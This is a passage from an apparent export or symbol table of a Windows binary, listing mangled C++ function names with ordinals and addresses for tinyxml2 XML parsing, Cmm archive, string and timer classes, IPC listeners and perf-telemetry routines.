              ?MetricsLoginEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_login_event@@@Z40760x468200
              ?MetricsMessageEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_message_event@@@Z40770x468760
              ?MetricsMessageHandlerEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_message_handler_event@@@Z40780x4687b0
              ?MetricsPlatformEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_platform_event@@@Z40790x468800
              ?Mid@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@I@Z40800x4054f0
              ?Mid@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@II@Z40810x405490
              ?Mid@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@I@Z40820x403640
              ?Mid@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@II@Z40830x4035e0
              ?MoveTimer@CTimerID@Cmm@@AAEX$$QAV12@@Z40840x451eb0
              ?MyTimerProcCallback@CTimerID@Cmm@@CGXPAUHWND__@@IIK@Z40850x452100
              ?Name@XMLAttribute@tinyxml2@@QBEPBDXZ40860x460f10
              ?Name@XMLElement@tinyxml2@@QBEPBDXZ40870x454740
              ?NameAt@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@I@Z40880x459cc0
              ?NewComment@XMLDocument@tinyxml2@@QAEPAVXMLComment@2@PBD@Z40890x462460
              ?NewDeclaration@XMLDocument@tinyxml2@@QAEPAVXMLDeclaration@2@PBD@Z40900x4624c0
              ?NewElement@XMLDocument@tinyxml2@@QAEPAVXMLElement@2@PBD@Z40910x462430
              ?NewText@XMLDocument@tinyxml2@@QAEPAVXMLText@2@PBD@Z40920x462490
              ?NewUnknown@XMLDocument@tinyxml2@@QAEPAVXMLUnknown@2@PBD@Z40930x462500
              ?Next@XMLAttribute@tinyxml2@@QBEPBV12@XZ40940x417010
              ?NextSibling@XMLConstHandle@tinyxml2@@QBE?BV12@XZ40950x454c80
              ?NextSibling@XMLHandle@tinyxml2@@QAE?AV12@XZ40960x454c80
              ?NextSibling@XMLNode@tinyxml2@@QAEPAV12@PBD@Z40970x454450
              ?NextSibling@XMLNode@tinyxml2@@QAEPAV12@XZ40980x454400
              ?NextSibling@XMLNode@tinyxml2@@QBEPBV12@PBD@Z40990x454410
              ?NextSibling@XMLNode@tinyxml2@@QBEPBV12@XZ41000x454400
              ?NextSiblingElement@XMLConstHandle@tinyxml2@@QBE?BV12@PBD@Z41010x454ca0
              ?NextSiblingElement@XMLHandle@tinyxml2@@QAE?AV12@PBD@Z41020x454ca0
              ?NextSiblingElement@XMLNode@tinyxml2@@QAEPAVXMLElement@2@PBD@Z41030x454460
              ?NextSiblingElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z41040x460740
              ?NoChildren@XMLNode@tinyxml2@@QBE_NXZ41050x454350
              ?NormalizeWindowsPathSeparators@FilePath@Cmm@@QBE?AV12@XZ41060x45b840
              ?Now@Time@Cmm@@SA?AV12@XZ41070x451740
              ?Now@TimeTicks@Cmm@@SA?AV12@XZ41080x451d00
              ?NowFromSystemTime@Time@Cmm@@SA?AV12@XZ41090x4518e0
              ?OnChannelConnected@Listener@Channel@ssb_ipc@@UAEXH@Z41100x402cf0
              ?OnChannelDisconnected@Listener@Channel@ssb_ipc@@UAEXH@Z41110x402cf0
              ?OnChannelError@Listener@Channel@ssb_ipc@@UAEXXZ41120x402f90
              ?OnTimerException@CTimerProc@Cmm@@AAEXXZ41130x452000
              ?OpenAlways@CFile@Cmm@@QAEXABVFilePath@2@W4EAccess@12@@Z41140x411630
              ?OpenAlways@CFile@Cmm@@QAEXPB_WW4EAccess@12@@Z41150x411600
              ?OpenElement@XMLPrinter@tinyxml2@@QAEXPBD_N@Z41160x462ea0
              ?OpenExisting@CFile@Cmm@@QAEXABVFilePath@2@W4EAccess@12@H@Z41170x4115d0
              ?OpenExisting@CFile@Cmm@@QAEXPB_WW4EAccess@12@H@Z41180x4115b0
              ?Parent@XMLNode@tinyxml2@@QAEPAV12@XZ41190x416e70
              ?Parent@XMLNode@tinyxml2@@QBEPBV12@XZ41200x416e70
              ?Parse@XMLDocument@tinyxml2@@AAEXXZ41210x462a00
              ?Parse@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PBDI@Z41220x4627a0
              ?ParseAsAttributeNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEHPAVXMLElement@tinyxml2@@@Z41230x458ba0
              ?ParseAsContainerNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEHPAVXMLElement@tinyxml2@@PAV123@@Z41240x459030
              ?ParseAsTextNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEHPAVXMLElement@tinyxml2@@@Z41250x454b60
              ?ParseAttributes@XMLElement@tinyxml2@@AAEPADPADPAH@Z41260x461cf0
              ?ParseDeep@XMLAttribute@tinyxml2@@AAEPADPAD_NPAH@Z41270x460f30
              ?ParseDeep@XMLComment@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41280x460c40
              ?ParseDeep@XMLDeclaration@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41290x460d40
              ?ParseDeep@XMLElement@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41300x461f90
              ?ParseDeep@XMLNode@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41310x4607a0
              ?ParseDeep@XMLText@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41320x460ad0
              ?ParseDeep@XMLUnknown@tinyxml2@@MAEPADPADPAVStrPair@2@PAH@Z41330x460e40
              ?ParseFile@CCmmArchiveService@Cmm@@SAPAVICmmArchiveObject@2@ABV?$CStringT@_W@2@W4StreamType@ICmmArchiveStream@2@@Z41340x455d10
              ?ParseMsg@?$CmmMessageTemplate_1@H@Archive@Cmm@@UAEHPBVCmmMQ_Msg@3@@Z41350x40d310
              ?ParseMsg@?$CmmMessageTemplate_1@I@Archive@Cmm@@UAEHPBVCmmMQ_Msg@3@@Z41360x40d310
              ?ParseMsg@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@UAEHPBVCmmMQ_Msg@3@@Z41370x40d310
              ?ParseMsg@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@UAEHPBVCmmMQ_Msg@3@@Z41380x40d310
              ?ParseMsg@?$CmmMessageTemplate_1@_J@Archive@Cmm@@UAEHPBVCmmMQ_Msg@3@@Z41390x40d310
              ?ParseMsgLen@CmmInternelMsg@Cmm@@SAIPBD@Z41400x45f590
              ?ParseName@StrPair@tinyxml2@@QAEPADPAD@Z41410x45fb40
              ?ParsePackageFromXmlDoc@CCmmArchiveServiceImp@Archive@Cmm@@QAEPAVICmmArchiveObject@3@AAVXMLDocument@tinyxml2@@@Z41420x4556d0
              ?ParseStream@CCmmArchiveService@Cmm@@SAPAVICmmArchiveObject@2@PBEIW4StreamType@ICmmArchiveStream@2@@Z41430x455c50
              ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z41440x45fac0
              ?PerfTelemetryInit@CCmmPerfTelemetry@@SAX_KABV?$CStringT@D@Cmm@@@Z41450x4675b0
              ?PerfTelemetryLogout@CCmmPerfTelemetry@@SAXXZ41460x467920
              ?PerfTelemetryReconnect@CCmmPerfTelemetry@@SAXXZ41470x4678c0
              ?PerfTelemetryTerm@CCmmPerfTelemetry@@SAXXZ41480x467750
              ?PopDepth@XMLDocument@tinyxml2@@AAEXXZ41490x462a80
              ?PopName@CCmmArchivePath@Cmm@@QAEXXZ41500x459c60
              ?PopUniqueID@CCmmPerfTelemetry@@QAEHABV?$CStringT@_W@Cmm@@AAV23@@Z41510x467450
              ?Pos@?$CStringT@D@Cmm@@QBEHABV12@@Z41520x4058d0
              ?Pos@?$CStringT@D@Cmm@@QBEHPBD@Z41530x4058f0
              ?Pos@?$CStringT@_W@Cmm@@QBEHABV12@@Z41540x403a40
              ?Pos@?$CStringT@_W@Cmm@@QBEHPB_W@Z41550x403a60
              ?PreviousSibling@XMLConstHandle@tinyxml2@@QBE?BV12@XZ41560x454c40
              ?PreviousSibling@XMLHandle@tinyxml2@@QAE?AV12@XZ41570x454c40
              ?PreviousSibling@XMLNode@tinyxml2@@QAEPAV12@XZ41580x4543e0
              ?PreviousSibling@XMLNode@tinyxml2@@QBEPBV12@XZ41590x4543e0
              ?PreviousSiblingElement@XMLConstHandle@tinyxml2@@QBE?BV12@PBD@Z41600x454c60
              ?PreviousSiblingElement@XMLHandle@tinyxml2@@QAE?AV12@PBD@Z41610x454c60
              ?PreviousSiblingElement@XMLNode@tinyxml2@@QAEPAVXMLElement@2@PBD@Z41620x4543f0
              ?PreviousSiblingElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z41630x460770
              ?Print@XMLDocument@tinyxml2@@QBEXPAVXMLPrinter@2@@Z41640x462860
              ?Print@XMLPrinter@tinyxml2@@IAAXPBDZZ41650x462b80
              ?PrintError@XMLDocument@tinyxml2@@QBEXXZ41660x4629d0
              ?PrintSpace@XMLPrinter@tinyxml2@@MAEXH@Z41670x462cd0
              ?PrintString@XMLPrinter@tinyxml2@@AAEXPBD_N@Z41680x462d00
              ?ProcessEntities@XMLDocument@tinyxml2@@QBE_NXZ41690x454b00
              ?Pulse@CState@Cmm@@QAEXXZ41700x40c270
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBD0@Z41710x462f70
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBDH@Z41720x462fb0
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBDI@Z41730x463000
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBDN@Z41740x463160
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBD_J@Z41750x463050
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBD_K@Z41760x4630b0
              ?PushAttribute@XMLPrinter@tinyxml2@@QAEXPBD_N@Z41770x463110
              ?PushComment@XMLPrinter@tinyxml2@@QAEXPBD@Z41780x463530
              ?PushDeclaration@XMLPrinter@tinyxml2@@QAEXPBD@Z41790x4635a0
              ?PushDepth@XMLDocument@tinyxml2@@AAEXXZ41800x462a60
              ?PushHeader@XMLPrinter@tinyxml2@@QAEX_N0@Z41810x462e50
              ?PushText@XMLPrinter@tinyxml2@@QAEXH@Z41820x463380
              ?PushText@XMLPrinter@tinyxml2@@QAEXI@Z41830x4633d0
              ?PushText@XMLPrinter@tinyxml2@@QAEXM@Z41840x463470
              ?PushText@XMLPrinter@tinyxml2@@QAEXN@Z41850x4634d0
              ?PushText@XMLPrinter@tinyxml2@@QAEXPBD_N@Z41860x463290
              ?PushText@XMLPrinter@tinyxml2@@QAEX_J@Z41870x4632e0
              ?PushText@XMLPrinter@tinyxml2@@QAEX_K@Z41880x463330
              ?PushText@XMLPrinter@tinyxml2@@QAEX_N@Z41890x463420
              ?PushUniqueID@CCmmPerfTelemetry@@QAEXABV?$CStringT@_W@Cmm@@0@Z41900x467420
              ?PushUnknown@XMLPrinter@tinyxml2@@QAEXPBD@Z41910x463610
              ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z41920x462c80
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAH@Z41930x454950
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAI@Z41940x454960
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAM@Z41950x4549b0
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAN@Z41960x4549a0
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_J@Z41970x454970
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_K@Z41980x454980
              ?QueryAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_N@Z41990x454990
              ?QueryBoolAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_N@Z42000x4547e0
              ?QueryBoolText@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PA_N@Z42010x461a40
              ?QueryBoolValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PA_N@Z42020x461080
              ?QueryDoubleAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAN@Z42030x454800
              ?QueryDoubleText@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PAN@Z42040x461a90
              ?QueryDoubleValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAN@Z42050x4610e0
              ?QueryFloatAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAM@Z42060x454820
              ?QueryFloatText@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PAM@Z42070x461ae0
              ?QueryFloatValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAM@Z42080x4610b0
              ?QueryInt64Attribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_J@Z42090x4547a0
              ?QueryInt64Text@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PA_J@Z42100x4619a0
              ?QueryInt64Value@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PA_J@Z42110x461020
              ?QueryIntAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAH@Z42120x454760
              ?QueryIntText@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PAH@Z42130x461900
              ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z42140x460fc0
              ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAPBD@Z42150x454840
              ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z42160x454870
              ?QueryUnsigned64Attribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPA_K@Z42170x4547c0
              ?QueryUnsigned64Text@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PA_K@Z42180x4619f0
              ?QueryUnsigned64Value@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PA_K@Z42190x461050
              ?QueryUnsignedAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAI@Z42200x454780
              ?QueryUnsignedText@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PAI@Z42210x461950
              ?QueryUnsignedValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAI@Z42220x460ff0
              ?QueryValueAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z42230x4548e0
              ?Read@CFile@Cmm@@QAEIPAXI@Z42240x4116a0
              ?ReadBOM@XMLUtil@tinyxml2@@SAPBDPBDPA_N@Z42250x45fd90
              ?ReadData@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42260x42dc70
              ?ReadData@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42270x42c400
              ?ReadData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42280x42e810
              ?ReadData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42290x428bc0
              ?ReadData@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42300x4292b0
              ?ReadData@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42310x42db60
              ?ReadData@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42320x42e730
              ?ReadData@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42330x428ae0
              ?ReadData@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42340x42da40
              ?ReadData@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42350x42e650
              ?ReadData@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42360x428a00
              ?ReadData@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42370x42d920
              ?ReadData@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42380x42e570
              ?ReadData@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42390x42d800
              ?ReadData@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42400x42e490
              ?ReadData@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42410x42d6e0
              ?ReadData@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42420x42e3b0
              ?ReadData@?$CmmMessageTemplate_1@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42430x436720
              ?ReadData@?$CmmMessageTemplate_1@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42440x40d5c0
              ?ReadData@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42450x40d3b0
              ?ReadData@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42460x40d920
              ?ReadData@?$CmmMessageTemplate_1@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42470x439940
              ?ReadData@?$CmmMessageTemplate_2@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42480x43a4d0
              ?ReadData@?$CmmMessageTemplate_2@HI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42490x43f290
              ?ReadData@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42500x43af70
              ?ReadData@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42510x437720
              ?ReadData@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42520x436660
              ?ReadData@?$CmmMessageTemplate_2@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42530x438a40
              ?ReadData@?$CmmMessageTemplate_2@II@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42540x435190
              ?ReadData@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42550x435bc0
              ?ReadData@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42560x40d6b0
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42570x43ce40
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42580x434f70
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42590x438ed0
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42600x4441e0
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42610x43da60
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42620x43b3d0
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42630x435f60
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42640x435650
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42650x443790
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42660x436320
              ?ReadData@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42670x40d9e0
              ?ReadData@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42680x442260
              ?ReadData@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42690x43f6c0
              ?ReadData@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42700x439870
              ?ReadData@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42710x43a7f0
              ?ReadData@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42720x43ac60
              ?ReadData@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42730x4401f0
              ?ReadData@?$CmmMessageTemplate_3@HII@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42740x440710
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42750x43e350
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42760x43aea0
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42770x43ca20
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42780x442ee0
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42790x445720
              ?ReadData@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42800x437650
              ?ReadData@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42810x4365a0
              ?ReadData@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42820x4404d0
              ?ReadData@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42830x438990
              ?ReadData@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42840x43d2f0
              ?ReadData@?$CmmMessageTemplate_3@III@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42850x436f50
              ?ReadData@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42860x43bfc0
              ?ReadData@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42870x435ad0
              ?ReadData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42880x446060
              ?ReadData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42890x439230
              ?ReadData@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42900x437fd0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42910x43cd90
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42920x43d0c0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42930x440e60
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42940x43ea80
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42950x43bc80
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42960x43c530
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42970x43fef0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42980x438dc0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z42990x4440f0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43000x43d9a0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43010x442b80
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43020x441c20
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43030x4446c0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43040x444aa0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43050x438310
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43060x43b1a0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43070x436ab0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43080x435eb0
              ?ReadData@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z43090x43a0d0
